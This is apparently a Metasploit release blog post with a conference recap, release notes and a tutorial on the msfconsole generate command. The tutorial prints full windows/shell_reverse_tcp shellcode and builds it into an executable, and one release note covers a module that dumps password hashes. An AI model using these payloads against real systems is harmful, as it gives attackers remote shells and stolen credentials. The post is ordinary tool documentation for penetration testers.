Hacker Summer Camp

Last week, the Metasploit team flew out to sunny, hot, and dry Las Vegas for Hacker Summer Camp (Black Hat, BSidesLV, and DEF CON). It was a full week of epic hacks, good conversation, and even a little business!

If you managed to catch us at our Open Source Office Hours (previously
OSSM, the Open Source Security Meetup) in Bally's, we just wanted to say
thanks for making the trek through the Las Vegas sun to come see us!

In between Vegas and the Exploit That Shall Not Be Named, we've been
steadily at work enhancing modules, the console, and fixing bugs for
this release.

msfvenom in my msfconsole?

Back in June of last year, we aligned the options for msfconsole's
generate command with msfvenom's options. Since the change was
subtle and may not have been picked up by the various tutorials on the
Net, this will be a quick recap on how to use the new-ish options.

If you're on Metasploit 5, please continue reading! If not, you can
continue to use the old invocation. :-)

Run help generate to see the new usage for the generate command.

msf5 payload(windows/shell_reverse_tcp) > help generate
Usage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce appropriate NOP sled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -x <opt>  Specify a custom executable file to use as a template
msf5 payload(windows/shell_reverse_tcp) >

Following the example in the usage, to specify datastore options in your
generate command, simply append them to the command line after normal
options.

msf5 payload(windows/shell_reverse_tcp) > generate -f python LHOST=127.0.0.1
# windows/shell_reverse_tcp - 324 bytes
# https://metasploit.com/
# VERBOSE=true, LHOST=127.0.0.1, LPORT=4444,
# ReverseAllowProxy=false, ReverseListenerThreaded=false,
# StagerRetryCount=10, StagerRetryWait=5,
# PrependMigrate=false, EXITFUNC=process, CreateSession=true
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68"
buf += "\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
buf += "\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
buf += "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
buf += "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
buf += "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
buf += "\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
buf += "\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
buf += "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
buf += "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
msf5 payload(windows/shell_reverse_tcp) >

What's even cooler is that generate will remember the datastore
options you gave it, allowing you to invoke it again with different
options, such as writing the payload to a file.

Here we demo writing the payload windows/shell_reverse_tcp to file
shell_reverse_tcp.exe without having to set LHOST again.

msf5 payload(windows/shell_reverse_tcp) > options

Module options (payload/windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf5 payload(windows/shell_reverse_tcp) > generate -f exe-only -o shell_reverse_tcp.exe
[*] Writing 73802 bytes to shell_reverse_tcp.exe...
msf5 payload(windows/shell_reverse_tcp) > file shell_reverse_tcp.exe
[*] exec: file shell_reverse_tcp.exe

shell_reverse_tcp.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf5 payload(windows/shell_reverse_tcp) >

We hope you find these changes useful. Happy hacking!

Enhancements and features

  • PR #12161 - The linux/gather/hashdump module has been updated to gather password history information from /etc/security/opasswd.

Bugs fixed

  • PR #12202 - This adds the needs_cleanup attribute to post modules, fixing a crash when the attribute is used (such as in FileDropper) without being available.
  • PR #12199 - This replaces a backtrace with a friendly error message when the user specifies an invalid value for RHOSTS in an exploit module.
  • PR #12198 - This restores functionality from Metasploit 4 and earlier where payload-specific options to the generate command can be passed with -o. For parity with the msfvenom command however, prefer simply specifying options directly with Metasploit 5 and later.
  • PR #12188 - This fixes tools/modules/module_author.rb to use the renamed fullname value.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

We recently announced the release of Metasploit 5. You can get it by cloning the Metasploit Framework repo (master branch). To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial editions).